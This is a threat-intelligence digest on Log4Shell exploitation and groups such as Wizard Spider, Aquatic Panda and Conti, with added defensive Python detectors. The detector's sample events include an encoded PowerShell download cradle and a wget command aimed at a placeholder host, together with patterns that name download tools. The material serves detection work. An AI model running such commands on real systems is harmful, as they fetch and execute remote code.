Unraveling Wizard Spider’s Operations

May 24, 2022

Industry: N/A | Level: Tactical | Source: Hacker News

Intelligence collected by PRODAFT revealed the nuances of the cybercriminal group Wizard Spider's organizational structure and goals. The group's financial successes fund its research and development plans, and maintaining an effective toolset is a priority for the group. The team discovered a hash-cracking system capable of unraveling “LM:NTLM hashes, cached domain credentials, Kerberos 5 TGS-REP/AS-REP tickets, KeePass files, MS Office 2013 files, and other types of common hashes.” A cold-calling system used to pressure non-responsive victims into paying the group's ransom was also reviewed. Wizard Spider's primary method of initial access is the distribution of spam emails carrying Qakbot malware or proxy malware such as SystemBC. The group was also found to be leveraging an exploit kit incorporating the Log4Shell vulnerability. Once the network has been infiltrated, the threat group conducts reconnaissance to identify high-value targets. Cobalt Strike is deployed to assist with lateral movement, and the group prioritizes obtaining domain admin privileges so that it can deploy Conti ransomware. Tools identified in use by Wizard Spider include numerous PowerShell scripts, Rubeus, SecretsDump, Adfind, Mimikatz, FileZilla, and Rclone.

Anvilogic Use Cases:

  • Executable Create Script Process
  • Rubeus Commands
  • Locate Credentials
  • Query Registry
  • NTDSUtil.exe execution
  • SecretsDump Credential Harvest
  • Adfind Execution
  • Adfind Commands
  • Mimikatz
  • Rclone Execution
  • Windows FTP Exfiltration

Log4Shell Vulnerability Vast & Abundant

May 03, 2022

Industry: N/A | Level: Tactical | Source: Rezilion

Since December 2021, the attack surface of the Log4Shell vulnerability has remained far-reaching. Research from Rezilion found that, four months on, the vulnerability is still present in many software products, and vulnerable versions continue to be downloaded and left unpatched. According to Sonatype's “Log4j Download Dashboard”, downloads of vulnerable Log4j versions persist: as of April 26th, 2022, 35% (395,281) of downloads were of vulnerable versions. Further analysis found that many Log4Shell-affected components remain unpatched: “When exploring the components affected by the Log4Shell vulnerability, i.e. components using org.apache.logging.log4j:log4j-core, it appears that out of a total of 17.84K affected packages, only 7.14K are patched for Log4Shell. This means that almost 60% of vulnerable packages are not yet patched!” Several factors could explain why users keep downloading vulnerable versions, including lack of awareness of the vulnerability, inability to detect it, and the use of third-party software that contains it. Detecting and/or patching against Log4Shell remains crucial given the severity of the vulnerability and the ease of exploiting it. Threat groups reported to be attempting to exploit the vulnerability include HAFNIUM, APT35, Tunnel Vision, and APT41/Deep Panda.

  • Anvilogic Scenario: Common Log4Shell Payload
  • Anvilogic Use Case: Potential CVE-2021-44228 – Log4Shell
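To make the “inability to detect it” point concrete, here is an added Python example (not Rezilion's or Sonatype's tooling) that classifies Maven coordinates for org.apache.logging.log4j:log4j-core against a version policy. The coordinate formats, the sample dependency list and the policy thresholds are assumptions made for the example; confirm the thresholds against the Apache Log4j security advisory before relying on them.

```python
"""Flag org.apache.logging.log4j:log4j-core versions that a dependency
inventory still pulls in (added example, not part of the report)."""
import re
from typing import Dict, Iterable, Tuple

LOG4J_CORE = "org.apache.logging.log4j:log4j-core"
VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?$", re.I)

# Example policy (assumed values; verify against the vendor advisory): the range
# affected by CVE-2021-44228, and a floor below which a build is still reported
# for review because of the follow-on Log4j fixes released after 2.15.0.
EXAMPLE_POLICY = {
    "vulnerable_from": "2.0-beta9",
    "vulnerable_to": "2.14.1",
    "review_below": "2.17.1",
}


def parse_version(version: str) -> Tuple[int, ...]:
    """Return a comparable tuple; a beta/rc sorts below the final release."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    major, minor, patch, pre, pre_n = m.groups()
    pre_rank = (0, int(pre_n)) if pre else (1, 0)
    return (int(major), int(minor), int(patch or 0)) + pre_rank


def classify(coordinate: str, policy: Dict[str, str] = EXAMPLE_POLICY) -> str:
    """Classify one Maven coordinate, either 'group:artifact:version' or the
    five-part 'group:artifact:type:version:scope' form that dependency listings print.
    Returns 'not-log4j-core', 'vulnerable', 'review' or 'ok'."""
    parts = coordinate.strip().split(":")
    if len(parts) == 3:
        group, artifact, version = parts
    elif len(parts) >= 5:
        group, artifact, version = parts[0], parts[1], parts[3]
    else:
        raise ValueError(f"unrecognised coordinate: {coordinate!r}")
    if f"{group}:{artifact}" != LOG4J_CORE:
        return "not-log4j-core"
    v = parse_version(version)
    if parse_version(policy["vulnerable_from"]) <= v <= parse_version(policy["vulnerable_to"]):
        return "vulnerable"
    if v < parse_version(policy["review_below"]):
        return "review"
    return "ok"


def scan(dependency_lines: Iterable[str], policy: Dict[str, str] = EXAMPLE_POLICY) -> Dict[str, str]:
    """Return {coordinate: verdict} for every log4j-core coordinate in the inventory."""
    findings = {}
    for line in dependency_lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        verdict = classify(line, policy)
        if verdict != "not-log4j-core":
            findings[line] = verdict
    return findings


# Constructed sample inventory, not taken from any real project.
SAMPLE_DEPENDENCIES = [
    "org.apache.logging.log4j:log4j-core:2.14.1",
    "org.apache.logging.log4j:log4j-api:2.14.1",
    "org.apache.logging.log4j:log4j-core:2.0-beta9",
    "org.apache.logging.log4j:log4j-core:2.16.0",
    "org.apache.logging.log4j:log4j-core:2.17.1",
    "com.example:unrelated-lib:1.0.0",
]

if __name__ == "__main__":
    for coord, verdict in scan(SAMPLE_DEPENDENCIES).items():
        print(f"{verdict:10s} {coord}")
```

Note that only log4j-core is checked: log4j-api alone does not carry the vulnerable lookup code, which is why the sample's log4j-api line is ignored.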

Deep Panda & Fire Chili Rootkits

April 05, 2022

Chinese APT group Deep Panda has been identified by researchers at FortiGuard Labs exploiting the Log4Shell vulnerability and deploying a new digitally signed rootkit dubbed Fire Chili.

Barracuda Threat Spotlight of Log4Shell Attack

March 08, 2022

Industry: N/A | Level: Tactical | Source: Barracuda

Barracuda's research and monitoring of the Log4Shell vulnerability have identified steady, consistent exploit activity with only a few dips. Attacker IP addresses largely originate from the US (83%), followed by Japan (10%), Germany and the Netherlands (3%), and Russia (1%). Payloads for the vulnerability range from benign YouTube link deliveries to threats involving cryptominer payloads, VMware exploits and DDoS malware. No ransomware attacks using the Log4Shell vulnerability have been observed so far.

  • Anvilogic Scenario: Unix File Download, Modified, Executed
  • Anvilogic Use Case: Potential CVE-2021-44228 – Log4Shell

Emissary Panda Attack Insight

February 22, 2022

Industry: N/A | Level: Tactical | Source: HVS-Consulting

A case study in HVS Consulting's report detailed a nine-month campaign by the threat group Emissary Panda, conducted in three distinct phases:

  1. Initial compromise with privilege escalation, lateral movement and data exfiltration
  2. Maintaining persistence and moving through the environment
  3. Attackers collecting and exfiltrating additional data

HVS assessed the major vulnerabilities of 2021, including ProxyLogon, Confluence and Log4Shell. ProxyLogon became the more widely exploited vulnerability following the discovery of additional Exchange vulnerabilities such as ProxyShell. Threat actors that have exploited Exchange vulnerabilities include Hafnium, Emissary Panda, Fancy Bear and the Winnti Group.

  • Anvilogic Scenario: APT27/Emissary Panda
  • Anvilogic Use Cases:
    • Potential ProxyShell
    • Potential Confluence: CVE-2021-26084
    • Potential CVE-2021-44228 – Log4Shell
    • Msiexec Abuse
    • New AutoRun Registry Key

Phosphorus/APT32 New PowerLess Trojan

February 08, 2022

Industry: N/A | Level: Tactical | Source: Cybereason

Research from Cybereason has identified the Iranian group Phosphorus/APT35/Charming Kitten utilizing a new PowerShell tool, the “PowerLess Backdoor,” while also exploiting the Log4Shell vulnerability. The new malware can download additional payloads for information stealing; what makes it unique is a new stealth technique, as detailed in the report: “to avoid PowerShell detection by running the PowerShell Backdoor in a .NET context rather than spawning the PowerShell process.” The evasion tactic doesn't prevent PowerShell events from being logged. The only instance in which a PowerShell process is spawned is when a process needs to be killed. Based on the IOCs reviewed from Cybereason, the infrastructure utilized for the attack is highly active, with an observed IP address overlapping with Memento Ransomware, which suggests a potential connection between the threat actor group and the ransomware.

  • Anvilogic Use Cases:
    • Executable Process from Suspicious Folder
    • Suspicious Powershell
    • Potential CVE-2021-44228 – Log4Shell
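An added Python example of the logging point above (not Cybereason's code): because a .NET-hosted runspace still writes engine-lifecycle records, a detection can key on the HostApplication value those records carry instead of on powershell.exe process creation. The record layout, the field names and the sample messages are constructed for the example; the only real detail relied on is that Windows PowerShell engine-lifecycle events (IDs 400 and 403) carry a HostApplication= line in their message text.

```python
import re
from typing import Dict, List, Optional

# Host executables expected to own a PowerShell engine. Anything else that reports
# an engine start is a candidate for an in-process (.NET-hosted) runspace.
KNOWN_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
HOST_APP_RE = re.compile(r"^\s*HostApplication=(.+?)\s*$", re.M)


def host_application(message: str) -> Optional[str]:
    """Pull the HostApplication= value out of an engine-lifecycle message."""
    m = HOST_APP_RE.search(message)
    return m.group(1) if m else None


def host_executable(host_app: str) -> str:
    """Reduce a HostApplication command line to its lower-cased executable name."""
    first = host_app.strip()
    if first.startswith('"'):
        first = first[1:].split('"', 1)[0]
    else:
        first = first.split(" ", 1)[0]
    return first.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def unexpected_hosts(events: List[Dict]) -> List[Dict]:
    """Return engine-lifecycle records whose host executable is not a known shell."""
    findings = []
    for ev in events:
        if ev["event_id"] not in (400, 403):
            continue  # script-block (4104) and other records carry no host application
        app = host_application(ev["message"])
        if app is None:
            continue
        exe = host_executable(app)
        if exe not in KNOWN_HOSTS:
            findings.append({"record_id": ev["record_id"], "host_executable": exe,
                             "host_application": app})
    return findings


# Constructed records (field names are assumptions; the message bodies imitate the
# Windows PowerShell engine-lifecycle text, including its HostApplication= line).
SAMPLE_EVENTS = [
    {"record_id": 1, "event_id": 400, "message":
        "Engine state is changed from None to Available.\n\nDetails:\n"
        "\tHostName=ConsoleHost\n"
        "\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
        "-File C:\\scripts\\backup.ps1\n"
        "\tEngineVersion=5.1.19041.1\n"},
    {"record_id": 2, "event_id": 400, "message":
        "Engine state is changed from None to Available.\n\nDetails:\n"
        "\tHostName=Default Host\n"
        "\tHostApplication=C:\\Users\\Public\\Libraries\\updater.exe\n"
        "\tEngineVersion=5.1.19041.1\n"},
    {"record_id": 3, "event_id": 4104, "message":
        "Creating Scriptblock text (1 of 1):\nGet-Process | Out-Null\n"},
]

if __name__ == "__main__":
    for finding in unexpected_hosts(SAMPLE_EVENTS):
        print(f"record {finding['record_id']}: PowerShell engine hosted by "
              f"{finding['host_executable']} ({finding['host_application']})")
```

The check fires on record 2 even though no powershell.exe process was ever created, which is exactly the gap a process-creation rule leaves open; the corresponding script-block records (4104) can then be pulled for the same time window to see what the hosted engine ran.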

Log4Shell and Coinminers

February 01, 2022

Industry: N/A | Level: Operational | Source: BlackBerry

BlackBerry Research & Intelligence and Incident Response (IR) identified attacks by the threat group Prophet Spider leveraging the Log4j vulnerability against the VMware Horizon platform. Attacks associated with the vulnerability were identified largely by monitoring child processes of ws_TomcatService.exe, which led to the execution of the PowerShell or cmd scripting interpreters. Post-exploitation, additional tools could be downloaded with PowerShell via encoded commands or Invoke-Expression, or with curl. To maintain persistence, scheduled tasks were created along with web shells. Lastly, clean-up of files was also observed to remove indicators.

  • Anvilogic Scenarios:
    • Cryptominer Install
    • Common Log4Shell Payload
  • Anvilogic Use Cases:
    • Potential CVE-2021-44228 – Log4Shell
    • Executable Create Script Process
    • Command Shell Executed by Process

ONUS Compromised from Log4Shell

December 29, 2021

Industry: Technology | Level: Tactical | Source: Cystack

The compromise of ONUS, a cryptocurrency platform in Vietnam, was reported by CyStack: the company's payment software from “Cyclos” was vulnerable to CVE-2021-44228/Log4Shell, and insecure configuration of the company's AWS S3 buckets escalated the attack. The attackers used Log4Shell payloads to establish a malicious connection and read the file “cyclos.properties”, which contained AWS credentials; this let them capitalize on the ONUS misconfiguration of granting “AmazonS3FullAccess permission to the access key which allowed attackers to compromise and easily delete all of the S3 buckets. Also on these servers, ONUS had a script to periodically back up the database to S3 which contained the database hostname and username/password as well as backup SQL files. As a consequence, the attackers could access the ONUS database to get user information.” They also downloaded a backdoor onto the server, disguised as the Linux operating system's kworker service, that tunneled a connection to the attacker's C2 server using SSH. The impact of the attack includes the compromise of 2 million ONUS users' records, including EKYC and personal data, and leaked password hashes.

  • Anvilogic Use Cases:
    • Potential CVE-2021-44228 – Log4Shell
    • AWS S3 Bucket Manipulation
    • SSH Pivoting
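An added Python example (not CyStack's or ONUS's code) that audits an IAM policy document for the pattern described above: destructive S3 actions allowed on every bucket, which is what turned one leaked access key into the loss of all buckets. The two policies are constructed: one grants the same s3:* on * that a full-access managed policy does, the other scopes a periodic backup job to a placeholder bucket. The placeholder bucket name and the list of actions treated as destructive are assumptions.

```python
import fnmatch
from typing import Dict, List

# S3 actions that let a single leaked key destroy or take over data. The list is
# an assumption for this example; extend it to match your own risk model.
DESTRUCTIVE_S3_ACTIONS = [
    "s3:DeleteBucket",
    "s3:DeleteObject",
    "s3:DeleteObjectVersion",
    "s3:PutBucketPolicy",
]
ANY_BUCKET = {"*", "arn:aws:s3:::*"}


def _as_list(value):
    """IAM accepts a string or a list in Action/Resource; normalise to a list."""
    return value if isinstance(value, list) else [value]


def action_matches(pattern: str, action: str) -> bool:
    """IAM action patterns are case-insensitive and support * and ? wildcards."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def audit_policy(policy: Dict) -> List[Dict]:
    """Flag Allow statements granting destructive S3 actions on every bucket.
    Simplification: Deny statements, NotAction and Condition blocks are ignored."""
    findings = []
    for index, stmt in enumerate(_as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action", []))
        resources = _as_list(stmt.get("Resource", []))
        granted = [d for d in DESTRUCTIVE_S3_ACTIONS
                   if any(action_matches(p, d) for p in actions)]
        if granted and any(r in ANY_BUCKET for r in resources):
            findings.append({"statement": index, "sid": stmt.get("Sid"),
                             "destructive_actions": granted, "resources": resources})
    return findings


# Constructed policy 1: the same grant a full-access managed policy gives (s3:* on *).
OVERBROAD_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Sid": "FullS3", "Effect": "Allow", "Action": "s3:*", "Resource": "*"}],
}

# Constructed policy 2: what a periodic database-backup job actually needs, scoped
# to one bucket. EXAMPLE-BACKUP-BUCKET is a placeholder name.
SCOPED_BACKUP_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "ListBackupBucket", "Effect": "Allow", "Action": "s3:ListBucket",
         "Resource": "arn:aws:s3:::EXAMPLE-BACKUP-BUCKET"},
        {"Sid": "WriteBackups", "Effect": "Allow", "Action": "s3:PutObject",
         "Resource": "arn:aws:s3:::EXAMPLE-BACKUP-BUCKET/*"},
    ],
}

if __name__ == "__main__":
    print("overbroad:", audit_policy(OVERBROAD_POLICY))
    print("scoped:   ", audit_policy(SCOPED_BACKUP_POLICY))
```

The scoped policy cannot delete anything, so a key leaked from a properties file on the application server would at worst let an attacker write extra objects into the backup bucket; keeping the credentials out of the readable properties file in the first place (for example via an instance role) is the companion fix the check does not cover.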

Aquatic Panda

December 29, 2021

Industry: Education | Level: Operational | Source: CrowdStrike

CrowdStrike's OverWatch team, while observing the Log4Shell vulnerability, identified an attempted exploit by “Aquatic Panda” against an unnamed academic institution. It started with a review of suspicious activity from a Tomcat process running under a vulnerable VMware Horizon instance. The suspicious activity included the threat actor running multiple connectivity checks through DNS lookups for a specific subdomain and attempting to execute curl and wget commands to retrieve tools; this was also peculiar because Linux commands were being executed on a Windows host by the Apache Tomcat service. As the affected institution worked towards mitigating the attack, OverWatch researchers continued to track it, identifying reconnaissance activity for system privileges and the download of additional scripts through a PowerShell Base64-encoded command that dropped three files with VBS file extensions, which, when decoded with “cscript.exe”, were identified as an EXE, a DLL and a DAT file. Attempts to harvest credentials were found in the form of dumping LSASS memory and using WinRAR to compress the memory dump for exfiltration. Eventually, the victim organization was able to patch the vulnerable application and thus stopped any further activity from Aquatic Panda.

  • Anvilogic Scenario: Aquatic Panda – Behaviors
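An added Python example (not BlackBerry's or CrowdStrike's code) that applies the parent/child process monitoring described in both the Log4Shell and Coinminers entry (ws_TomcatService.exe spawning PowerShell or cmd, encoded commands, Invoke-Expression, curl) and this Aquatic Panda entry (curl/wget under the Tomcat service on Windows, a Base64-encoded PowerShell command, cscript.exe running VBS files). The event field names, the extra Tomcat/Java parent image names and the sample events are constructed for the example.

```python
import base64
import re
from typing import Dict, List

# Parent images that should rarely spawn a shell or downloader: the Tomcat service
# wrapper named in BlackBerry's report plus generic Tomcat/Java service names
# (the latter two are assumptions for this example).
WEB_SERVICE_PARENTS = {"ws_tomcatservice.exe", "tomcat9.exe", "java.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "cscript.exe", "wscript.exe"}
DOWNLOADERS = {"curl", "curl.exe", "wget", "wget.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_RE = re.compile(r"invoke-expression|\biex\b|downloadstring|downloadfile|invoke-webrequest", re.I)


def decode_encoded_command(command_line: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' when there is none.
    PowerShell expects the argument as base64 of UTF-16LE text."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:
        return ""


def _basename(path: str) -> str:
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: Dict[str, str]) -> List[str]:
    """Tag one process-creation event. Field names (parent_image, image,
    command_line) are assumptions modelled on a Sysmon event 1 record."""
    parent = _basename(event.get("parent_image", ""))
    image = _basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    tokens = {_basename(t) for t in cmd.split()}
    tags = []
    spawned_tool = image in INTERPRETERS or image in DOWNLOADERS or bool(tokens & DOWNLOADERS)
    if parent in WEB_SERVICE_PARENTS and spawned_tool:
        tags.append("web-service-spawned-shell")
    if image in DOWNLOADERS or tokens & DOWNLOADERS:
        tags.append("command-line-downloader")
    decoded = decode_encoded_command(cmd)
    if decoded:
        tags.append("encoded-powershell")
    # Inspect the raw command line and the decoded payload together for a cradle.
    if image in {"powershell.exe", "pwsh.exe"} and CRADLE_RE.search(cmd + " " + decoded):
        tags.append("download-cradle")
    if image in {"cscript.exe", "wscript.exe"} and any(t.endswith(".vbs") for t in tokens):
        tags.append("script-host-vbs")
    return tags


def _encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (paths and URLs are made up for the example).
SAMPLE_EVENTS = [
    {"parent_image": r"C:\app\ws_TomcatService.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c whoami"},
    {"parent_image": r"C:\app\ws_TomcatService.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + _encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")},
    {"parent_image": r"C:\app\tomcat9.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c wget http://example.invalid/x -O x"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\cscript.exe",
     "command_line": r"cscript.exe C:\Users\Public\a.vbs"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{_basename(ev['parent_image'])} -> {_basename(ev['image'])}: {analyze(ev) or 'clean'}")
```

The fourth event (an administrator's scheduled script under explorer.exe) produces no tags, which is the point of anchoring the first rule on the parent image rather than on the interpreter alone: the Tomcat service has no business starting a shell, whereas PowerShell itself is everywhere.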

Conti & Log4Shell from AdvIntel

December 21, 2021

Industry: N/A | Level: Tactical | Source: AdvIntel

Continued vigilance on the threat landscape following Log4Shell has identified the Conti ransomware group showing signs of interest. A report from AdvIntel detailed that Conti had been deprived of new viable attack vectors since November and had been searching for new methods. It wasn't until the fallout of Log4Shell that the ransomware group finally found what it had been looking for. Multiple Conti members have been identified initiating scanning activity for the exploit. A recent quote from AdvIntel confirmed, “the criminals pursued targeting specific vulnerable Log4J2 VMware vCenter for lateral movement directly from the compromised network resulting in vCenter access affecting US and European victim networks from the pre-existent Cobalt Strike sessions.”

  • Anvilogic Scenarios:
    • Log4Shell Payload
    • Kinsing Behaviors
    • Unix File Download, Modified, Executed
  • Anvilogic Use Cases:
    • Potential CVE-2021-44228 – Log4Shell
    • File Download (Unix)
    • Modify File Attributes